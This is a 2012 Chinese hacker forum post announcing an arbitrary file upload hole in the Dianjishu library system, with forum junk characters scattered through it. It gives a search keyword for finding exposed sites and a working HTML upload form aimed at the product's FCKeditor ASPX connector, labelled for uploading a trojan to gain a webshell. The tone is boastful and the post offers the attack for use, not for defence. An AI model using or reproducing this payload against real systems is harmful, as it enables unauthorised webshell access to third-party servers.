主题:图书馆系统任意文件上传漏洞: D. N! `( n. ^+ [( L
作者:冰锋刺客
& x5 }& Q; ]. x6 f- l! z) a 厂商:点击书(dianjishu.com)
]3 b* D: |+ M% x 日期:2012-6-21* e% H2 K$ O6 S1 m& d* k4 _
8 [- K8 T7 k) yI 概述
0 ]& L# y+ B$ [ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
7 ^% n" M6 s& v II 简介
* K O9 C6 n: m5 o& j6 O- D 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
+ Q5 G4 C# |5 j 补充一个漏洞1 X5 p6 O2 K. K
<form id="frmUpload" enctype="multipart/form-data"
( b( N- ]4 s# Q$ R1 U0 L9 q2 x action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
; S0 W" V8 ]& C' n' C' K. G0 V: K <input id="btnUpload" type="submit" value="操翻他">( P l, u# [2 \5 ?
</form>
7 r) W- ]/ p( W* {$ Y4 l7 b 你们懂的6 z) ?4 Q* n) R l
那傻逼提供还需要改包.3 h4 g: @& m$ D! J. _0 M' f
自己看了下源代码发现fckeditor: k, I$ x" ~9 W! Z4 z1 l8 P) b& k, _
直接秒杀
: w" p' C2 Q5 @& D) g |
发表于 2012-9-10 21:20:59
收藏
支持
反对